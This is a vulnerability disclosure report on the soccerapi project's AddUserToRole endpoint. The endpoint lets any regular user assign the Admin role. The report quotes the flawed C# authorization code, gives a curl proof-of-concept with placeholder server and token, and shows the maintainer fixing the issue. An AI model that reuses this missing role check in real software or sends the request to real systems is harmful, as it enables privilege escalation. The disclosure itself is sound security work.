Normal user can set himself or any other user to admin role in badea741/soccerapi


Reported on

Sep 20th 2022


Improper access to an API endpointAddUserToRole can allow a regular user to escalate his privileges to be an admin

Infected code

[Authorize(Roles = Roles.User)]
    public async Task<IActionResult> AddUserToRole([FromQuery] string username, string role)
        var results = await _auth.AddUserToRoleAsync(username, role);
        if (!results.IsSuccess)
            return BadRequest(results);
        return Ok(results);

As seen it just allows a user role to access this endpoint and no proper checks for what role can be added So it can be an admin role

Proof of Concept

curl -X 'POST' \
  'http://<SERVER>/Auth/AddUserToRole?username=<AnyUser>&role=Admin' \
  -H 'accept: */*' \
  -H 'Authorization: <TOKEN>' \
  -d ''


An attacker can escalate his privileges to be an admin in a peace of cake way.

We are processing your report and will contact the badea741/soccerapi team within 24 hours. a year ago
Aly Khaled modified the report
a year ago
We created a GitHub Issue asking the maintainers to create a a year ago
We have contacted a member of the badea741/soccerapi team and are waiting to hear back a year ago
badea741 validated this vulnerability a year ago
0x41ly has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
badea741 marked this as fixed in 1.1 with commit 2a06fc a year ago
The fix bounty has been dropped
AuthController.cs#L67 has been validated
to join this conversation